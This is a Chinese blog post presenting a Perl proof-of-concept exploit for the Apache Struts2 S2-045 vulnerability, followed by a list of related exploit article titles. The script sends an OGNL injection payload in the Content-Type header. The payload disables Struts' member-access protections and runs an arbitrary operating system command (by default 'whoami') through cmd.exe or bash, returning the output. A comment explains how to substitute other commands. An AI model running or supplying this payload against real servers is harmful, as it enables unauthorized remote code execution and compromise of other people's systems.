st2-045漏洞利用poc
2017-03-08 01:40
351 查看
1 use LWP::UserAgent; 2 3 undef $/; 4 if(@ARGV != 1){print "Use:poc.pl http://target/index.action\n";exit;} 5 my $url = shift; 6 my $ua = LWP::UserAgent->new; 7 my $req = HTTP::Request->new(POST => $url); 8 my $head = <DATA>; 9 $req->content_type($head); 10 11 my $rep = $ua->request($req); 12 print $rep->content; 13 14 15 16 #如要修改命令, 请把24行的whoami修改为相当的命令就行 17 __DATA__ 18 %{(#nike='multipart/form-data'). 19 (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). 20 (#_memberAccess?(#_memberAccess=#dm): 21 ((#container=#context['com.opensymphony.xwork2.ActionContext.container']). 22 (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). 23 (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()). 24 (#context.setMemberAccess(#dm)))).(#cmd='whoami'). 25 (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). 26 (#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})). 27 (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)). 28 (#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse(). 29 getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). 30 (#ros.flush())}
相关文章推荐
- struts2 s2-045漏洞利用poc
- Apache Struts 2 S2-045 高危漏洞利用工具poc+Exp
- struts2-045漏洞poc调试
- Apache Struts2(S2-045)漏洞利用
- OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
- 网站安全加固之apache环境S2-057漏洞 利用POC 远程执行命令漏洞复现
- Apache Struts2(S2-045)漏洞利用
- 【更新WordPress 4.6漏洞利用PoC】PHPMailer曝远程代码执行高危漏洞(CVE-2016-10033)
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
- OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解
- OpenSSL 漏洞利用程序脚本 POC
- 利用Strutss02-045漏洞快速渗透韩国某服务器 推荐
- 【实验】如何本地搭建Struts2框架对S2-045漏洞进行利用
- S2-045漏洞利用工具&解决方案
- 利用pdf的js函数漏洞构造堆喷射的攻击思路
- 利用日志与secureCRT检查漏洞
- 利用老版本 Redis 漏洞获取服务器 root 权限。
- 利用CVE-2010-2883漏洞制作pdf马
- xss漏洞发现及利用
- 网站安全检测 网站漏洞修复 对thinkphp通杀漏洞利用与修复建议